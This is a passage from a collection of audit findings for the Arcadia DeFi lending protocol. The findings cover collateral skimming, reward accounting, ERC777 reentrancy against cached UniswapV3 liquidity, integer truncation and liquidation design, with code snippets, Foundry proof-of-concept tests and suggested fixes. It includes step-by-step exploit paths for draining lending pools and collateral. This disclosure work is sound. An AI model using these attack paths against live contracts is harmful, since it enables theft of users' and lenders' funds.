        if (!IRegistry(REGISTRY).checkOracleSequence(newOracles)) revert BadOracleSequence();

        assetToInformation[assetKey].oracleSequence = newOracles;
    }

Registry::checkOracleSequence

    function checkOracleSequence(bytes32 oracleSequence) external view returns (bool) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();
        uint256 length = oracles.length;
        if (length == 0) revert RegistryErrors.Min1Oracle();
        ...
    }

Tool used

Foundry

Recommendation

Add a function like setAssetInformation to init the assetInformation directly in the contract PrimaryAM, or modify code so that empty bytes will not be used for checkOracleSequence.

jesjupyer - The owner can bypass the check of `notDuringAuction` and `isAccountUnhealthy` and drain some colleteral tokens using `skim`

jesjupyer

high

The owner can bypass the check of notDuringAuction and isAccountUnhealthy and drain some colleteral tokens using skim

Summary

The function AccountV1::skim is performed by the owner to skims non-deposited assets from the Account. For this operation, there is no check of notDuringAuction nor isAccountUnhealthy since the tokens have the extra amount and are not counted as collateral. However, if a collateral token has multiple addresses/entrances (like TrueUSD,...), the owner could use the other address as token and drain the corresponding collateral token amount, bypassing the check of notDuringAuction and isAccountUnhealthy.

Vulnerability Detail

In the function AccountV1::skim, the
non-deposited assets will be returned to the owner.

        if (type_ == 0) {
            uint256 balance = ERC20(token).balanceOf(address(this));
            uint256 balanceStored = erc20Balances[token];
            if (balance > balanceStored) {
                ERC20(token).safeTransfer(msg.sender, balance - balanceStored);
            }
        }

Since the assets are not counted as collateral, so the function has no check of notDuringAuction nor isAccountUnhealthy.

    function skim(address token, uint256 id, uint256 type_) public onlyOwner nonReentrant updateActionTimestamp {
    ...
    }

However, some ERC20 tokens (like TrueUSD) have multiple addresses/entrances, all pointing to the same underlying address. If a token of this is used as the collateral, calling skim with another entrance will definitely have different ERC20(token).balanceOf(address(this)) and erc20Balances[token]. Thus, the original collateral token has been drained by the owner.

This could happen when the account is being liquidated and no withdraw could be done by the owner due to notDuringAuction check. Also, if the owner gets tricked into doing this, his account may get into unhealthy state without isAccountUnhealthy check and could be liquidated.

Impact

If a token with multiple addresses/entrances is used as the collateral, calling skim with another entrance will have different ERC20(token).balanceOf(address(this)) and erc20Balances[token]. Thus, the original collateral token has been drained by the owner.

If the account is being liquidated and no withdraw could be done by the owner due to notDuringAuction check, the owner could use this to drain some tokens from the account.

Also, If the owner is tricked into doing this, his account may get into unhealthy state without isAccountUnhealthy check and could be liquidated.

Code Snippet

AccountV1::skim

    function skim(address token, uint256 id, uint256 type_) public onlyOwner nonReentrant updateActionTimestamp {
        if (token == address(0)) {
            (bool success, bytes memory result) = payable(msg.sender).call{ value: address(this).balance }("");
            require(success, string(result));
            return;
        }

        if (type_ == 0) {
            uint256 balance = ERC20(token).balanceOf(address(this));
            uint256 balanceStored = erc20Balances[token];
            if (balance > balanceStored) {
                ERC20(token).safeTransfer(msg.sender, balance - balanceStored);
            }
        } else if (type_ == 1) {
            bool isStored;
            uint256 erc721StoredLength = erc721Stored.length;
            for (uint256 i; i < erc721StoredLength; ++i) {
                if (erc721Stored[i] == token && erc721TokenIds[i] == id) {
                    isStored = true;
                    break;
                }
            }

            if (!isStored) {
                IERC721(token).safeTransferFrom(address(this), msg.sender, id);
            }
        } else if (type_ == 2) {
            uint256 balance = IERC1155(token).balanceOf(address(this), id);
            uint256 balanceStored = erc1155Balances[token][id];

            if (balance > balanceStored) {
                IERC1155(token).safeTransferFrom(address(this), msg.sender, id, balance - balanceStored, "");
            }
        }
    }

Tool used

Manual Review, VSCode

Recommendation

Add a check to ensure that getCollateralValue() before and after the skim is not changed.

matejdb - createAccount function on Factory contract is calling _mint instead of _safeMInt when minting tokens (nfts)

matejdb

medium

createAccount function on Factory contract is calling _mint instead of _safeMInt when minting tokens (nfts)

Summary

Function createAccount on Factory contract should call _safeMint when minting new accounts of nfts instead of _mint.

Vulnerability Detail

The usage of _safeMint guarantees that the receiver to address is either a smart contract that implements IERC721Receiver.onERC721Receivedor an EOA.

Impact

Token (or account) can be stuck on contract that does not implement receiver.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Factory.sol#L105C1-L105C47

Tool used

Manual Review

Recommendation

Use _safeMint() instead of _mint() for ERC721 minting in createAccount function.

rvierdiiev - AbstractStakingAM allows owner of nft to withdraw balance before selling nft

rvierdiiev

high

AbstractStakingAM allows owner of nft to withdraw balance before selling nft

Summary

AbstractStakingAM allows owner of nft to withdraw balance before selling nft. This is because there is no any restrictions that exist inside vault.

Vulnerability Detail

When user locks LP tokens in the AbstractStakingAM, then erc721 token is created for him. Later user can do whatever he wants with this erc721 token. So it's possible that such tokens will be traded on markets.

AbstractStakingAM.decreaseLiquidity function decreases position balance for the nft. Currently there is no guarantee for the purchaser, that he will receive nft with LP amount that he wanted to buy as nft owner can decrease almost whole position right before order will be filled in the nft marketplace.

Impact

Nft purchaser can get less amount of LP.

Code Snippet

Provided above

Tool used

Manual Review

Recommendation

Inside Vault contract you have already implemented protection with lastActionTimestamp variable. You can reuse it here as well. Or you can allow to use StakingAM.mint to put token as collateral only. In this case function should send token to the vault after creation and when withdraw from vault it should unstake fully.

zzykxx - Stargate `STG` rewards are accounted incorrectly by `StakedStargateAM.sol`

zzykxx

high

Stargate STG rewards are accounted incorrectly by StakedStargateAM.sol

Summary

Stargate LP_STAKING_TIME contract clears and sends rewards to the caller every time deposit() is called but StakedStargateAM does not take it into account.

Vulnerability Detail

When either mint() or increaseLiquidity() are called the assetState[asset].lastRewardGlobal variable is not reset to 0 even though the rewards have been transferred and accounted for on stargate side.

After a call to mint() or increaseLiquidity() any subsequent call to either mint(), increaseLiquidity(), burn(), decreaseLiquidity(), claimRewards() or rewardOf(), which all internally call _getRewardBalances(), will either revert for underflow or account for less rewards than it should because assetState_.lastRewardGlobal has not been correctly reset to 0 but currentRewardGlobal (which is fetched from stargate) has:

uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌
function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
    currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
}

POC

To copy-paste in USDbCPool.fork.t.sol:

function testFork_WrongRewards() public {
    uint256 initBalance = 1000 * 10 ** USDbC.decimals();
    // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.
    vm.startPrank(users.accountOwner);
    deal(address(USDbC), users.accountOwner, initBalance);

    USDbC.approve(address(router), initBalance);
    router.addLiquidity(poolId, initBalance, users.accountOwner);
    // assert(ERC20(address(pool)).balanceOf(users.accountOwner) > 0);

    // And : The user stakes the LP token via the StargateAssetModule
    uint256 stakedAmount = ERC20(address(pool)).balanceOf(users.accountOwner);
    ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmount);
    uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmount) / 4);

    //We let 10 days pass to accumulate rewards.
    vm.warp(block.timestamp + 10 days);

    // User increases liquidity of the position.
    uint256 initialRewards = stakedStargateAM.rewardOf(tokenId);
    stakedStargateAM.increaseLiquidity(tokenId, 1);

    vm.expectRevert();
    stakedStargateAM.burn(tokenId); //❌ User can't call burn because of underflow

    //We let 10 days pass, this accumulates enough rewards for the call to burn to succeed
    vm.warp(block.timestamp + 10 days);
    uint256 currentRewards = stakedStargateAM.rewardOf(tokenId);
    stakedStargateAM.burn(tokenId);

    assert(currentRewards - initialRewards < 1e10); //❌ User gets less rewards than he should. The rewards of the 10 days the user couldn't withdraw his position are basically zeroed out.
    vm.stopPrank();
}

Impact

Users will not be able to take any action on their positions until currentRewardGlobal is greater or equal to assetState_.lastRewardGlobal. After that they will be able to perform actions but their position will account for less rewards than it should because a total amount of assetState_.lastRewardGlobal rewards is nullified.

This will also DOS the whole lending/borrowing system if an Arcadia Stargate position is used as collateral because rewardOf(), which is called to estimate the collateral value, also reverts.

Code Snippet

Tool used

Manual Review

Recommendation

Adjust the assetState[asset].lastRewardGlobal correctly or since every action (mint(), burn(), increaseLiquidity(), decreaseliquidity(), claimReward()) will have the effect of withdrawing all the current rewards it's possible to change the function _getRewardBalances() to use the amount returned by _getCurrentReward() as the deltaReward directly:

uint256 deltaReward = _getCurrentReward(positionState_.asset);

0xrice.cooker - Uphappy flow when liquidation not check if the debt owner have any unwithdraw surplus amount stored in the Lending Pool

0xrice.cooker

medium

Uphappy flow when liquidation not check if the debt owner have any unwithdraw surplus amount stored in the Lending Pool

Summary

Uphappy flow when liquidation not check if the debt owner's realisedLiquidityOf[debt's owner] stored in the Lending Pool. Instead it will decrease staker's vault to payback the debt

Vulnerability Detail

The variable mapping(address => uint256) internal realisedLiquidityOf used to distribute mostly to LendingPool's tranches and treasury. It also ditribute to normal users in these case
- Reward to initator who startLiquidation()
- Reward to terminator who is the settle the auction
- Send surplus amount to the debt owner when terminator overbid in happy flow

After that, normal user can withdraw the asset out using withdrawFromLendingPool().

Note the surplus amount received by debt owner can't be used to deduct the amount of the new debt when that debt owner got liquidated again. When things go wrong, the new debt have go to unhappy flow and have to decrease tranche liquidity to pay back bad debt. Because of that, staker in the junior tranche will lose their profits.
We can deduct the impact of bad debt here by checking if the debt owner's realisedLiquidityOf[debt owner] have any unclaimed assets to pay back the debt.

Impact

This lead to the protocol staking vault more vurnable to bad debt

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L938C1-L966C6
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L372C1-L385C6
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L983C1-L1031C6

Tool used

Manual Review

Recommendation

Step 1: we need to send surplus amount when happy flow to the debt account, not debt owner -> easier for step 2, 3
Step 2: we need to restrict all borrower who have borrow any asset in the LendingPool by DOS withdrawFromLendingPool(). We must only let borrower withdraw when borrower have no debt any that particular LendingPool
Step 3: we need to implement the logic of deducting logic in _settleLiquidationHappyFlow() function

Here is my fix, note that this is not tested and not bug-free:
Step 1: https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L938C1-L966C6

    function _settleLiquidationHappyFlow(
        address account,
        uint256 startDebt,
        uint256 minimumMargin_,
        address terminator,
        uint256 surplus
    ) internal {
        (uint256 initiationReward, uint256 terminationReward, uint256 liquidationPenalty) =
            _calculateRewards(startDebt, minimumMargin_);

        _syncLiquidationFee(liquidationPenalty);

        totalRealisedLiquidity =
            SafeCastLib.safeCastTo128(totalRealisedLiquidity + terminationReward + liquidationPenalty + surplus);

        unchecked {
-           if (surplus > 0) realisedLiquidityOf[IAccount(account).owner()] += surplus;
+           if (surplus > 0) realisedLiquidityOf[account] += surplus;
            realisedLiquidityOf[terminator] += terminationReward;
        }

        _endLiquidation();
    }

Step 2: https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L372C1-L385C6

-   function withdrawFromLendingPool(uint256 assets, address receiver)
+   function withdrawFromLendingPool(uint256 assets, address receiver, address account)
        external
        whenWithdrawNotPaused
        processInterests
    {
    	address withdrawer = msg.sender;
+	if (account != address(0)){
+		if(IFactory(ACCOUNT_FACTORY).ownerOfAccount(account) != msg.sender || maxWithdraw(account) > 0) revert;
+		withdrawer = account;
+	}
    

-       if (realisedLiquidityOf[msg.sender] < assets) revert LendingPoolErrors.AmountExceedsBalance();
+       if (realisedLiquidityOf[withdrawer] < assets) revert LendingPoolErrors.AmountExceedsBalance();
        unchecked {
-           realisedLiquidityOf[msg.sender] -= assets;
+           realisedLiquidityOf[withdrawer] -= assets;
            totalRealisedLiquidity = SafeCastLib.safeCastTo128(totalRealisedLiquidity - assets);
        }

        asset.safeTransfer(receiver, assets);
    }

Step 3: https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L983C1-L1031C6

    function settleLiquidationUnhappyFlow(
        address account,
        uint256 startDebt,
        uint256 minimumMargin_,
        address terminator
    ) external whenLiquidationNotPaused onlyLiquidator processInterests {
        (uint256 initiationReward, uint256 terminationReward, uint256 liquidationPenalty) =
            _calculateRewards(startDebt, minimumMargin_);


        uint256 debtShares = balanceOf[account];
        uint256 openDebt = convertToAssets(debtShares);
        uint256 badDebt;
        if (openDebt > terminationReward + liquidationPenalty) {
            unchecked {
                badDebt = openDebt - terminationReward - liquidationPenalty;
            }
            
+           uint256 deductFromBorrower = realisedLiquidityOf[account];
+           if (badDebt > deductFromBorrower){
+		totalRealisedLiquidity = uint128(totalRealisedLiquidity - badDebt);
+            	badDebt -= deductFromBorrower;
+		realisedLiquidityOf[account] = 0;
+		_processDefault(badDebt);
+           } else {
+		totalRealisedLiquidity = uint128(totalRealisedLiquidity - badDebt);
+	     	realisedLiquidityOf[account] -= badDebt;
+	     	badDebt = 0;
+	    }

-            totalRealisedLiquidity = uint128(totalRealisedLiquidity - badDebt);
-            _processDefault(badDebt);
        } else {
            ...
        }

        ...
    }

jesjupyer - Some NFT can be both ERC721 and ERC1155, which is not considered by the design

jesjupyer

medium

Some NFT can be both ERC721 and ERC1155, which is not considered by the design

Summary

Some NFT is meant to support both ERC721 and ERC1155 (for example, see Asset Token). But this case is not considered in the contract. If a token of this kind is added firstly by ERC721-typed AssetModule, it can not be supported by ERC1155-typed AssetModule, and its transfer will be greatly limited since an amount larger than 1 will cause revert.

Vulnerability Detail

In the AbstractAM::constructor, the ASSET_TYPE is fixed and will be later returned in AbstractAM::processAsset

    constructor(address registry_, uint256 assetType_) Owned(msg.sender) {
        REGISTRY = registry_;
        ASSET_TYPE = assetType_;
    }
    ...
    function processAsset(address asset, uint256 assetId) external view virtual returns (bool, uint256) {
        return (isAllowed(asset, assetId), ASSET_TYPE);
    }

But for ERC721-typed AssetModule(including mock files like FloorERC721AM), when adding assets, the function supportsInterface is never called for the assets.

However, Some NFTs are meant to support both ERC721 and ERC1155 (for example, see Asset Token). So if a token of this kind is added firstly by ERC721-typed AssetModule, it can not be supported by ERC1155-typed AssetModule due to the check in Registry::addAsset

    function addAsset(address assetAddress) external onlyAssetModule {
        if (inRegistry[assetAddress]) revert RegistryErrors.AssetAlreadyInRegistry();

        inRegistry[assetAddress] = true;

        emit AssetAdded(assetAddress, assetToAssetModule[assetAddress] = msg.sender);
    }

Thus, the NFT's transfer will be greatly limited since ERC721 only supports transfer by amount 1.

An example of this can been seen in AccountV1::_deposit and AccountV1::_withdraw

            } else if (assetTypes[i] == 1) {
                if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();
                _withdrawERC721(to, assetAddresses[i], assetIds[i]);
            }

Impact

If a token that supports both ERC721 and ERC1155 is added firstly by ERC721-typed AssetModule, it can not be supported by ERC1155-typed AssetModule again, and its transfer will be greatly limited since the amount can not exceed 1.

Code Snippet

AbstractAM::constructor

    constructor(address registry_, uint256 assetType_) Owned(msg.sender) {
        REGISTRY = registry_;
        ASSET_TYPE = assetType_;
    }

AbstractAM::processAsset

    function processAsset(address asset, uint256 assetId) external view virtual returns (bool, uint256) {
        return (isAllowed(asset, assetId), ASSET_TYPE);
    }

Registry::addAsset

    function addAsset(address assetAddress) external onlyAssetModule {
        if (inRegistry[assetAddress]) revert RegistryErrors.AssetAlreadyInRegistry();

        inRegistry[assetAddress] = true;

        emit AssetAdded(assetAddress, assetToAssetModule[assetAddress] = msg.sender);
    }

AccountV1::_deposit and AccountV1::_withdraw

            } else if (assetTypes[i] == 1) {
                if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();
                _depositERC721(from, assetAddresses[i], assetIds[i]);
            } else if (assetTypes[i] == 2) {

Tool used

Manual Review, VSCode

Recommendation

Consider this kind of situation and perform checks so that if an NFT is meant to support both ERC721 and ERC1155, it could only be added by ERC1155-typed AssetModule.

zzykxx - Lending pools that accept both ERC777 and UniswapV3 positions as collateral can be drained

zzykxx

high

Lending pools that accept both ERC777 and UniswapV3 positions as collateral can be drained

Summary

Depositing a fully compliant ERC777 token with a UniswapV3 position as collateral allows an attacker to steal funds and potentially drain the lending pools.

Vulnerability Detail

The AccountV1::deposit() function allows to deposit multiple assets at once. It first executes Registry::batchProcessDeposit() and then proceeds to transfer the assets from the caller to the AccountV1 contract.

Registry::batchProcessDeposit() will execute a downstream call to UniswapV3AM::_addAsset() for UniswapV3 positions, which caches the amount of liquidity of the position:

function _addAsset(uint256 assetId) internal {
     ...
    (,, address token0, address token1,,,, uint128 liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);
     assetToLiquidity[assetId] = liquidity;
     ...
}

This can be exploited when combined with a deposit of a fully compliant ERC777 token that implements a tokensToSend hook that executes an external call to the address the token is being transferred from. This is possible in the following way:

  1. Call AccountV1::deposit() to deposit an ERC777 token and a UniswapV3 position: [ERC777, UniswapV3 position]
  2. When Registry::batchProcessDeposit() is executed, UniswapV3AM::_addAsset() will cache the current liquidity of the UniwapV3 position
  3. When AccountV1::_depositERC20() on the ERC777 token is executed the attacker gets a callback and takes control of the call flow
  4. The attacker decreases the liquidity of the UniswapV3 position, this is possible because the UniswapV3 position NFT has not been transferred yet
  5. AccountV1::_depositERC721() is executed and the UniswapV3 position is deposited
  6. Because the liquidity of the UniswapV3 position has been cached in step 2 the protocol will think the position is valued more than it is
  7. Borrow assets for a value higher than the collateral and create bad debt in the protocol

POC

With the test suite the project provided creating a POC for this attack would take a lot of time. A complete POC would require modifications to the custom UniswapV3 fork test-suite provided by the team in DIscord to add ERC777 token support and I think the idea is straightforward enough to not need a runnable POC. If one is necessary I will create an external repo with a functioning one.

Impact

An attacker can drain lending pools/creditors that accept both ERC777 and UniswapV3 positions as collateral.

Code Snippet

Tool used

Manual Review

Recommendation

The root cause of the described issue is that the liquidity of a UniswapV3 position is cached, but since removing this would create surface for other attacks a good idea might be to check the liquidity of the UniswapV3 position again after the deposits have been executed and make sure is equal to the initial one.

An additional thing to consider is that this kind of attack could be used with future added assets in other ways, it might be worth considering moving the batchProcessDeposit() call after the deposits are executed, but I'm not entirely sure this does not introduce other attack vectors.

Duplicate of #154

joshuajee - Unsafe casting from `uint256` to `uint8` on the `tranches` array length, causing the emitting of incorrect values

joshuajee

medium

Unsafe casting from uint256 to uint8 on the tranches array length, causing the emitting of incorrect values

Summary

The tranches length was cast from uint256 to uint8, and the value is emitted as the tranchIndex, this will lead to a wrong value being emitted as tranchIndex when the length of tranches exceeds 255.

Vulnerability Detail

The maximum value for uint8 is 255, and uint256 is way bigger, the length of an array is a uint256 value, and in the code, the length of the tranches array was cast to uint8, this is an issue because the tranches array can grow above 255 in length, this will cause the protocol to emit wrong tranchIndex
E.g
When the tranches array length is 256 the tranchIndex would be 0
When it is 257 the tranchIndex would be 1 and so on.

Impact

Emission of the wrong tranchIndex on-chain, thereby feeding indexers with wrong data

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L216C1-L229C6

    function addTranche(address tranche, uint16 interestWeight_) external onlyOwner processInterests {
        if (auctionsInProgress > 0) revert LendingPoolErrors.AuctionOngoing();
        if (isTranche[tranche]) revert LendingPoolErrors.TrancheAlreadyExists();

        totalInterestWeight += interestWeight_;
        interestWeightTranches.push(interestWeight_);
        interestWeight[tranche] = interestWeight_;

@>   uint8 trancheIndex = uint8(tranches.length);
        tranches.push(tranche);
        isTranche[tranche] = true;

        emit InterestWeightTrancheUpdated(tranche, trancheIndex, interestWeight_);
    }

This line is also affected

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L244

POC

This is a simple proof of concept, here the true trancheIndex was 256 but, it emitted 0,
add this code to
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/test/fuzz/LendingPool/Constructor.fuzz.t.sol
and run it with the command below

    forge test --mt "testFuzz_poc_tranche_Casting"
    function testFuzz_poc_tranche_Casting(uint256 vas) public {
        vm.startPrank(users.creatorAddress);
        for (uint i = 1; i <= 256; i++) {
            address _tranche = address(new TrancheExtension(address(pool), vas, "Tranche", "T"));
            vm.expectEmit();
            emit InterestWeightTrancheUpdated(_tranche, uint8(i), 0);
            pool.addTranche(_tranche, 0);
        }
        // The protocol will emit 0 as tranche index instead of 256 
        address _tranche = address(new TrancheExtension(address(pool), vas, "Tranche", "T"));
        vm.expectEmit();
        emit InterestWeightTrancheUpdated(_tranche, 0, 0);
        pool.addTranche(_tranche, 0);
        vm.stopPrank();
 
    }

Tool used

Manual Review and Foundry

Recommendation

Do not cast the tranches length to uint8, and make the following modification to the codebase

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L143

-    event InterestWeightTrancheUpdated(address indexed tranche, uint8 indexed trancheIndex, uint16 interestWeight);
+    event InterestWeightTrancheUpdated(address indexed tranche, uint indexed trancheIndex, uint16 interestWeight);

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L224C9-L224C53

-    uint8 trancheIndex = uint8(tranches.length);
+    uint trancheIndex = tranches.length;

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L244

-     emit InterestWeightTrancheUpdated(tranche, uint8(index), interestWeight_);
+    emit InterestWeightTrancheUpdated(tranche, index, interestWeight_);

Or put a cap on the length of the tranches array that can be added, so that it doesn't exceed 255 which is the maximum value for uint8

Duplicate of #32

jesjupyer - The hidden criteria "Length can be maximally 3" may make `checkOracleSequence` return wrong value

jesjupyer

medium

The hidden criteria "Length can be maximally 3" may make checkOracleSequence return wrong value

Summary

There is no check of the length of the input array in BitPackingLib::pack. Later in the processing of oracleSequence, BitPackingLib::unpack has a hidden criteria that the length of chain can be maximally 3. If the length exceeds 3, BitPackingLib.unpack() can maximally return arrays of length 3. Since this criterion is not cited nor explicitly checked, if the user inputs a sequence with a length greater than 3(for example, 4-7), the input would be truncated without reverting. Two scenarios would happen: 1. An unqualified sequence would accidentally be considered valid. 2. A sequence that meets other criteria will be considered unqualified with the wrong reason being given.

Vulnerability Detail

In the BitPackingLib::pack function, even though the array length is required to be equal or less than 3, it is not explicitly checked.

    function pack(bool[] memory boolValues, uint80[] memory uintValues) internal pure returns (bytes32 packedData) {
        assembly {
            // Get the length of the arrays.
            let length := mload(boolValues)

            // Store the total length in the two right most bits
            // Length is always smaller than or equal to 3.
            packedData := length
            ...
        }
        ...
    }

Later, when the packedData is used as oracleSequence in unpack, it can only maximally return arrays of length 3 since 0x3 is hard-coded. So, if the length is 5, the first 1 element is parsed from the oracleSequence. If the length is 6, the first 2 elements are parsed from the oracleSequence. If the length is 7, the first 3 elements are parsed from the oracleSequence.

    function unpack(bytes32 packedData) internal pure returns (bool[] memory boolValues, uint256[] memory uintValues) {
        assembly {
            // Use bitmask to extract the array length from the rightmost 2 bits.
            // Length is always smaller than or equal to 3.
            let length := and(packedData, 0x3)
            ...
        }
        ...
    }

Since in Registry::checkOracleSequence, the value is directly used to check the criteria(Ex. The oracle must be previously added to the Registry and must still be active...). If the user inputs a sequence with a length greater than 3(for example, 5-7), the input would be truncated without reverting.

    function checkOracleSequence(bytes32 oracleSequence) external view returns (bool) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();
        uint256 length = oracles.length;
        if (length == 0) revert RegistryErrors.Min1Oracle();
        // Length can be maximally 3, but no need to explicitly check it.
        // BitPackingLib.unpack() can maximally return arrays of length 3.
        ...
    }

There are two scenarios to consider:

  • An unqualified sequence would accidentally be considered valid

    • When the input is with oracle pairs (A, USD), (B, USD), (B,C), (C,D), (D,E), the total length is 5.
    • After unpack is called, only (A, USD) pair is parsed.
    • Since the parsed path ended with USD, the checkOracleSequence would return true, but in the real scenario, it should be false.
  • A sequence that meets other criteria will be considered unqualified with the wrong reason being given

    • When the input is with oracle pairs (A, B), (B, C), (C,D), (D,USD), the total length is 4.
    • After unpack is called, the array length is 0. Since 0x4 & 0x3 = 0.
    • The function would revert with RegistryErrors.Min1Oracle() which is incorrect.

Impact

If the user inputs a sequence with a length greater then 3(for example, 4-7), the input would be truncated without reverting. Two scenarios would happen: 1. An unqualified sequence would accidentally be considered valid. 2. A sequence that meets other criteria will be considered unqualified with the wrong reason being given. This is not robust or fault-tolerance.

Code Snippet

BitPackingLib::pack

            // Get the length of the arrays.
            let length := mload(boolValues)

            // Store the total length in the two right most bits
            // Length is always smaller than or equal to 3.
            packedData := length

BitPackingLib::unpack

            // Length is always smaller than or equal to 3.
            let length := and(packedData, 0x3)

Registry::checkOracleSequence

    function checkOracleSequence(bytes32 oracleSequence) external view returns (bool) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();
        uint256 length = oracles.length;
        if (length == 0) revert RegistryErrors.Min1Oracle();
        // Length can be maximally 3, but no need to explicitly check it.
        // BitPackingLib.unpack() can maximally return arrays of length 3.

Tool used

Manual Review, VSCode

Recommendation

A few things should be done:

  1. limit the input array length in BitPackingLib::pack
  2. Check the byte length in BitPackingLib::unpack to guarantee that packedData has no bytes unvisited after the iteration.

0xrice.cooker - Borrower have a risk of getting liquidate all of the collateral with a low price

0xrice.cooker

medium

Borrower have a risk of getting liquidate all of the collateral with a low price

Summary

We don't have any method to protect borrower from getting liquidate all, even when the borrow position is healthy back again

Vulnerability Detail

It's common sense that most bidder will wait for the collateral price in auction to go down below the market to buy collateral cause no one will give others money for free. In Dutch auction, the collateral will go from high to low until the debt position come back to healthy state. Because of that, the last bidder will have the most profit. In blockchain world, being the last bidder will become even easier because of frontrunning. If the story end here then it will not have anything to talk about. But in here, because we can overbuy the collateral when we are the last bidder, last bidder can just buy most of borrower collateral (he can left some collateral because it will not profit him) with a low price

Let's have a scenario here:
- Borrower A deposit 1000$ worth of collateral to his margin account, and borrow 400$ worth of asset. Assume here that liquidation factor is 60%, collateral factor is 40%, minimumMargin = 0 for simpler calculation
- Overtime, his debt increase to 600$ which is liquidatable, so someone will call to startLiquidation() to start liquidate his account
- After a while of auction, he only have 200$ worth of debt and 450$ worth of collateral which can be bought with 350$
- Notice here that borrower A will only need someone to buy 41$, which will the account to become healthy again.
- Scenario 1: If someone buy 41$ more: Borrower A have 200 - 41 = 159$ worth of debt, 450 - (41 * 450 / 350) = 397$ worth of collateral, the position backs to healthy (397 * 0.4 = 159). The difference between collateral and debt is 397 - 159 = 239$
- Scenario 2: but because the terminator can overbid, terminator will buy all of borrower's asset with 350$. Later on, terminator will sell all of just-bought collateral in the open market with the price 450$ -> gaining 100$ profit
- On the other hand, the action end with borrower only have 350 - 200 = 150$ worth of asset, the debt is fully paid

As you can see, there's massive difference for borrower between 2 scenarios.

Impact

The borrower will very likely losing all the collateral when the account being auctioned, because bidder is very incentive of bought all the collateral.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L500C1-L508C10

Tool used

Manual Review

Recommendation

We should implement a logic that prevent bidder overbid too much from borrower. It can be something like this:

    function auctionRepay(uint256 startDebt, uint256 minimumMargin_, uint256 amount, address account, address bidder)
        external
        whenLiquidationNotPaused
        onlyLiquidator
        processInterests
        returns (bool earlyTerminate)
    {
        // Need to transfer before burning debt or ERC777s could reenter.
        // Address(this) is trusted -> no risk on re-entrancy attack after transfer.
        asset.safeTransferFrom(bidder, address(this), amount);

        uint256 accountDebt = maxWithdraw(account);
        if (accountDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();
        if (accountDebt <= amount) {
+   	    if(amount - accountDebt > OVERBID_MAXIMUM) revert;

            earlyTerminate = true;
            unchecked {
                _settleLiquidationHappyFlow(account, startDebt, minimumMargin_, bidder, (amount - accountDebt));
            }
            amount = accountDebt;
        }

        _withdraw(amount, address(this), account);

        emit Repay(account, bidder, amount);
    }

n1punp - Contract functionality may silently fail due to hardcoded Permit2 contract address not available on some L2s.

n1punp

medium

Contract functionality may silently fail due to hardcoded Permit2 contract address not available on some L2s.

Summary

Contract functionality may silently fail due to Permit2 contract not available on some L2s.

Vulnerability Detail

As stated in the chains that the contract will be deployed on, it is possible that this code will be used for other L2s as well.

The AccountV1 contract hardcoded the Permit2 contract address to 0x000000000022D473030F116dDEE9F6B43aC78BA3 . This is correct for some L2s, but also not on some L2s. For example,

When _transferFromOwnerWithPermit is invoked, the function will fail.

Impact

Contract may silently fail until the Permit2 functionality is used by the users.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/accounts/AccountV1.sol#L56

Tool used

Manual Review

Recommendation

Either

  • Assign the permit2 address in the constructor, or
  • Validate the existence of the contract address in the constructor, so deployment does not pass silently

AgileJune - Chainlink aggregators return the incorrect price if it drops below minAnswer

AgileJune

medium

Chainlink aggregators return the incorrect price if it drops below minAnswer

Summary

Chainlink aggregators return the incorrect price if it drops below minAnswer

Vulnerability Detail

Chainlink aggregators are equipped with a built-in circuit breaker to manage situations where the price of an asset moves outside of a predetermined price range. In the event of a significant decrease in an asset's value, such as the case with the LUNA crash, the oracle will continue to return the minAnswer instead of the actual price of the asset. This mechanism, detailed in Chainlink's documentation, includes minAnswer and maxAnswer circuit breakers to mitigate potential issues when the asset's price falls below the minAnswer.

Impact

This issue could potentially allow users to exploit certain parts of the protocol, leading to significant issues and potential loss of funds, which is exactly what happened to Venus on BSC when LUNA imploded.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/oracle-modules/ChainlinkOM.sol#L113-L129

Tool used

Manual Review

Recommendation

